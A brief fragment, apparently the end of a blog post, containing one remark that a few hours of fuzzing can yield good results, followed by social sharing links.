Note: A few hours with a fuzzer can give you good results.
-------

Twitter Delicious Facebook Digg Stumbleupon Favorites More